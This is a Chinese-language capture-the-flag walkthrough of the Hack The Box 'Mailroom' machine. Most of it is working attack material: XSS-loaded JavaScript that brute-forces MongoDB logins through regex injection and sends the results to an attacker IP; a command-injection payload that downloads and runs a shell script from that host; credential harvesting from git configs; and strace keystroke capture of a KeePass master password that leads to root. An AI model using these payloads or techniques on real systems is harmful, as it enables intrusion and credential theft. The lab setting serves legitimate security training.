hackthebox Mailroom Hard难度抄wp复现

参考这位up主的:

Hack The Box 赛季活动靶场【MailRoom】System Flag攻略_哔哩哔哩_bilibili

Hack The Box 赛季活动靶场【MailRoom】User Flag攻略_哔哩哔哩_bilibili

在留言板XSS打内网的网页(这个网页存在MongoDB正则表达式注入,根据返回的http状态码,来盲注密码)

git clone https://github.com/SrcVme50/Mailroom

guess_username.js

async function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);
            cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
        }
    };
    http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
    fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail)
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")

guess_password.js

async function callAuth2(pass) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify2(pass);
            cal2("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~", pass);
        }
    };
    http.send("[email protected]&password[$regex]=^"+pass);
}
function notify2(pass) {
    fetch("http://10.10.14.50:30088/r8.sh?" + pass);
}
function cal2(chars, pass) {
    for (var i = 0; i < chars.length; i++) {
        callAuth2(pass+chars[i])
    }
}
var chars99 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~";
cal2(chars99, "");

root@071381841c9e:/var/www/staffroom# cat auth.php 
<?php
require 'vendor/autoload.php';

session_start(); // Start a session
$client = new MongoDB\Client("mongodb://mongodb:27017"); // Connect to the MongoDB database
header('Content-Type: application/json');
if (!$client) {
  header('HTTP/1.1 503 Service Unavailable');
  echo json_encode(['success' => false, 'message' => 'Failed to connect to the database']);
  exit;
}
$collection = $client->backend_panel->users; // Select the users collection

// Authenticate user & Send 2FA if valid
if (isset($_POST['email']) && isset($_POST['password'])) {

  // Verify the parameters are valid
  if (!is_string($_POST['email']) || !is_string($_POST['password'])) {
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
  }

  // Check if the email and password are correct
  $user = $collection->findOne(['email' => $_POST['email'], 'password' => $_POST['password']]);

  if ($user) {
    // Generate a random UUID for the 2FA token
    $token = bin2hex(random_bytes(16));
    $now = time();

    // Update the user record in the database with the 2FA token if not already sent in the last minute
    $user = $collection->findOne(['_id' => $user['_id']]);
    if(($user['2fa_token'] && ($now - $user['token_creation']) > 60) || !$user['2fa_token']) {
        $collection->updateOne(
          ['_id' => $user['_id']],
          ['$set' => ['2fa_token' => $token, 'token_creation' => $now]]
        );

        // Send an email to the user with the 2FA token
        $to = $user['email'];
        $subject = '2FA Token';
        $message = 'Click on this link to authenticate: http://staff-review-panel.mailroom.htb/auth.php?token=' . $token;
        mail($to, $subject, $message);
    }
    // Return a JSON response notifying about 2fa
    echo json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);
    exit;

  } else {
    // Return a JSON error response
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid email or password']);
  }
}

// Check for invalid parameters
else if (!isset($_GET['token'])) {
  header('HTTP/1.1 400 Bad Request');
  echo json_encode(['success' => false, 'message' => 'Email and password are required']);
  exit;
}

// Check if the form has been submitted
else if (isset($_GET['token'])) {
  // Verify Token parameter is valid
  if (!is_string($_GET['token']) || strlen($_GET['token']) !== 32) {
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid input detected']);
    exit;
  }

  // Check if the token is correct
  $user = $collection->findOne(['2fa_token' => $_GET['token']]);

  if ($user) {
    // Set the logged_in flag and name in the session
    $_SESSION['logged_in'] = true;
    $_SESSION['name'] = explode('@', $user['email'])[0];

    // Remove 2FA token since user already used it to log in
    $collection->updateOne(
      ['_id' => $user['_id']],
      ['$unset' => ['2fa_token' => '']]
    );

    // Redirect to dashboard since login was successful
    header('Location: dashboard.php');
    exit;
  } else {
    // Return a JSON error response
    header('HTTP/1.1 401 Unauthorized');
    echo json_encode(['success' => false, 'message' => 'Invalid 2FA Login Token']);
    exit;
  }
}


?>
root@071381841c9e:/var/www/staffroom#

# 如下之前是http://10.10.14.37:77/user.js ,后期才发现火狐浏览器禁止访问77端口,像8080,和8090等高端口不做限制所以把77换成30088;

cd /tmp;
npm install -g http-server 
# -g  --global  会将模块安装到全局
http-server -p 30088 --cors=access-control-allow-origin &

curl -v -d 'email=123%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script>'   http://mailroom.htb/contact.php

# curl http://mailroom.htb/inquiries/a527e53f4ffd0574844e7483ba0904a9.html |grep -C5 10.10.14.50

POST /contact.php HTTP/1.1
Host: mailroom.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://mailroom.htb
Connection: close
Referer: http://mailroom.htb/contact.php
Upgrade-Insecure-Requests: 1

email=12342%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.37:30088/user.js"></script>

root@79585e1c3ddf:/var/www/mailroom/template# cat ai.py 
#!/usr/bin/python3
# This script is used to simulate the Ai visiting the page and rating if the inquery looks relevent or irrelevant
import os
import sys
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service

# "Hack" to fix Firefox not launching without a writable home directory
os.environ["HOME"] = "/tmp"

def main(id):
    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Firefox(service=Service(executable_path='/var/www/mailroom/template/geckodriver', log_path='/dev/null'), options=options)
    driver.set_page_load_timeout(30)
    try:
        driver.get(f"http://127.0.0.1/inquiries/{id}.html")
        print(driver.title)
    finally:
        driver.close()

if __name__ == '__main__':
    if len(sys.argv) < 2 or len(sys.argv[1]) != 32:
        exit()
    main(sys.argv[1])
root@79585e1c3ddf:/var/www/mailroom/template#

如下可以爆php路径:

root@mailroom:~#  curl -v -d "email[]=qwe&password[]=abc" http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 26
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 26 out of 26 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:19:20 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=58a2b1cce2a8d677a0f63c16d0fed89a; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 303
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/staffroom/auth.php:20) in <b>/var/www/staffroom/auth.php</b> on line <b>51</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
{"success":false,"message":"Invalid email or password"}root@mailroom:~# 
root@mailroom:~#

root@mailroom:~#  curl -v -d 'email[$regex]=.*)@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:24:00 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=9105dc031fc8878b739a6948f2d27b79; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 917
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: unmatched parentheses in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}
  thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#

Regular expression is invalid: unmatched parentheses

parentheses:圆括号

root@mailroom:~#  curl -v -d 'email[$regex]=.*(@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:27:33 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=87d6127a132d28b22f6e2336eb9e99e5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 905
< Content-Type: application/json
< 
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing ) in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}
  thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#

Regular expression is invalid: missing )

curl -v -d 'email[$regex]=.*[@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;

<b>Fatal error</b>: Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing terminating ] for character class in /var...

ai.py脚本貌似有时间(30秒超时:driver.set_page_load_timeout(30) )限制,一次不一定会把用户名和密码完全跑出来,需要多试几次,或者手动改脚本接力.

[2023-05-02T12:48:39.661Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:40.571Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:41.191Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:42.313Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

[2023-05-02T12:50:07.703Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:16.170Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.026Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.700Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:18.075Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:19.371Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:21.002Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:23.135Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:24.445Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:26.546Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:27.895Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:30.574Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:31.304Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"


[2023-05-02T12:51:56.771Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:57.689Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:58.201Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:59.442Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:52:04.265Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

继续想办法把时间拉长的30秒极限:

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

生成的html包含2个js加载器,第二个的服务器端为php( http://10.10.14.50:8090/)

http://10.10.14.50:8090/?c=123 的内容为:

echo "<?php set_time_limit(600);sleep(120);">/tmp/index.php ;

启动php的命令为:

cat /tmp/index.php ;
setsid php -n -S 0.0.0.0:8090 -t /tmp&

这样制作的话,服务器里的selenium不会那么快退出.

在30秒内,username能猜解完毕,password还差几位字符,需要接力(不接力了,多试几次就ok):

[2023-05-02T15:39:12.945Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:19.952Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:20.744Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.258Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.683Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:23.333Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:24.978Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:26.546Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"


[2023-05-02T15:39:54.784Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:55.901Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:56.770Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:57.557Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:59.597Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:02.004Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:04.039Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:06.605Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:08.711Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:10.680Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:11.877Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:14.318Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:20.160Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

ssh仅仅允许tristan登录:

grep Match /etc/ssh/sshd_config;

# ssh -o StrictHostKeyChecking=no [email protected]

# paaword: a$gBa3!GA8

ssh -o StrictHostKeyChecking=no [email protected]

tristan 密码:69trisRulez!

ssh登录成功后:

#使用curl发送登录请求:
 curl -v -d "email=tristan%40mailroom.htb&password=69trisRulez%21" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"    http://staff-review-panel.mailroom.htb/auth.php;
# 状态码200 {"success":true,"message":"Check your inbox for an email with your 2FA token"}


grep -o -E "(http://.*)" /var/mail/tristan
# 选最后一条:
myurl2=$(grep -o -E "(http://.*)" /var/mail/tristan|tail -n 1);
echo $myurl2;



#访问激活邮件:
#http://staff-review-panel.mailroom.htb/auth.php?token=2ae50255deba57587ac9f9555857beeb
curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" $myurl2|grep message
# 状态码302 重定向到dashboard.php


#访问主页,这一步可以不要:
#curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/dashboard.php



#插入恶意命令:
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

反弹shell成功后,发现是在容器里,执行如下一句话看密码:

cat /var/www/mailroom/.git/config /var/www/staffroom/.git/config

url = http://matthew:HueLover83%23@gitea:3000/matthew/mailroom.git

得到matthew密码是:
HueLover83#

回到虚拟机的shell里:

su - matthew

matthew@mailroom:~$ cat ~/user.txt
a371327b52dde700c969109e3315ac3c
matthew@mailroom:~$

ls -al /home/matthew/personal.kdbx; python3 -V ;

scp上传密码库到kali,这一步后来发现也没有必要,直接在靶机里使用kpcli破解密码就行:

scp -P 40022 -o StrictHostKeyChecking=no \
/home/matthew/personal.kdbx [email protected]:/tmp/

提示: 靶机是台虚拟机,会自动清除/tmp目录的文件,但是以.开头的隐藏文件无法删除,所以我保存在/tmp目录下的.pwd.log里.

# strace -o /tmp/.pwd.log -p ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `

matthew@mailroom:/tmp$ ./ps  aux
PID   USER     TIME  COMMAND
42939 matthew   0:00 -bash
43013 matthew   0:00 /lib/systemd/systemd --user
43019 matthew   0:00 {kpcli} /usr/bin/perl /usr/bin/kpcli
43023 matthew   0:00 ./ps aux
matthew@mailroom:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
matthew    42939  0.2  0.1   8392  5148 pts/2    S    15:57   0:00 -bash
matthew    43013  0.6  0.2  19188  9764 ?        Ss   15:57   0:00 /lib/systemd/systemd --user
matthew    43019  1.2  0.6  29520 24468 ?        Ss   15:57   0:00 /usr/bin/perl /usr/bin/kpcli
matthew    43030  0.0  0.0   8888  3232 pts/2    R+   15:57   0:00 ps aux
matthew@mailroom:/tmp$ strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
strace: option requires an argument -- 'p'
Try 'strace -h' for more information.
matthew@mailroom:/tmp$


#  这是因为进程没有启动,它会每隔1分钟启动一次.稍等一会就好

grep "read(0" /tmp/.pwd.log |grep -v unavailable

# grep -E "read|write" /tmp/.pwd.log|grep 8192 |grep read|grep -v unavailable

matthew@mailroom:/tmp$ grep 8192 /tmp/.pwd.log |grep "read(0"|grep -v unavailable
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
matthew@mailroom:/tmp$

root@fv-az345-528:/tmp# grep -E "read|write"   /tmp/123123.txt|grep 8192 |grep read|grep -v unavailable
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(5, "\npackage Compress::Raw::Zlib;\n\nr"..., 8192) = 8192
read(5, " if $validate && $value !~ /^\\d+"..., 8192) = 8192
read(5, "    croak \"Compress::Raw::Zlib::"..., 8192) = 8192
read(5, "# XML::Parser\n#\n# Copyright (c) "..., 8192) = 8192
read(6, "package XML::Parser::Expat;\n\nuse"..., 8192) = 8192
read(6, ";\n    }\n}\n\nsub position_in_conte"..., 8192) = 8192
read(5, "package MIME::Base64;\n\nuse stric"..., 8192) = 5450
read(6, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(6, "", 8192)                       = 0
read(7, "# NOTE: Derived from blib/lib/Te"..., 8192) = 665
read(7, "", 8192)                       = 0
root@fv-az345-528:/tmp#

\10是删除键

如上得知: 密码库的密码是: !sEcUr3p4$$w0rd9

!sEcUr3p4$$w0rd9

如下自己没有必要安装kpcli,靶机自己就有,直接拿来用,也可以的

keepass2是图形界面工具,本次不用也可以

ubuntu20.04 安装keepass
sudo apt-add-repository ppa:jtaylor/keepass;\
sudo apt-get update && sudo apt-get upgrade;\
sudo apt-get install keepass2 -y;\
sudo apt install kpcli  -y;


2.运行keepass2

root@fv-az345-528:/tmp# keepass2 --version
KeePass 2.45
Copyright ? 2003-2020 Dominik Reichl
root@fv-az345-528:/tmp#

kpcli  --kdb /tmp/personal.kdbx
ls
cd Root/
ls
show -f -a 4
quit




kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password                                                
3. My Gitea Account                                       git.mailroom.htb
4. root acc                                                               
kpcli:/Root> show -f -a 4

Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL: 
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never

kpcli:/Root> quit

matthew@mailroom:~$ kpcli  --kdb ~/personal.kdbx 
Please provide the master password: *************************

KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password                                                
3. My Gitea Account                                       git.mailroom.htb
4. root acc                                                               
kpcli:/Root> show -a -f 4

Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL: 
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never

kpcli:/Root> quit
matthew@mailroom:~$

matthew@mailroom:/tmp$ su - 
Password: 
root@mailroom:~# ls
cleanup.sh  cleanup.sh.bak  containers  kpcli.sh  matthew_kpcli.py  matthew_kpcli.py.bak  personal.kdbx  personal.kdbx.bak  root.txt
root@mailroom:~# cat root.txt 
7fe0c9a1297e4b3fb9ab8259c67c63a1
root@mailroom:~# 
root@mailroom:~# docker ps -a
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS        PORTS                               NAMES
ed9dafc5f146   containers_sites         "docker-php-entrypoi…"   14 hours ago   Up 14 hours   0.0.0.0:80->80/tcp, :::80->80/tcp   containers_sites_1
be13e7868b63   gitea/gitea:1.18         "/usr/bin/entrypoint…"   14 hours ago   Up 14 hours   22/tcp, 3000/tcp                    containers_gitea_1
a792a1685ae4   postgres:15.1-bullseye   "docker-entrypoint.s…"   14 hours ago   Up 14 hours   5432/tcp                            containers_db_1
178ce6c64a6b   mongo:4.2.23             "docker-entrypoint.s…"   14 hours ago   Up 14 hours   27017/tcp                           containers_mongodb_1
root@mailroom:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mailroom:~# 


 # 这步应该不需要了
 # docker exec -it containers_sites_1  /bin/bash -c 'chmod +s /bin/bash'

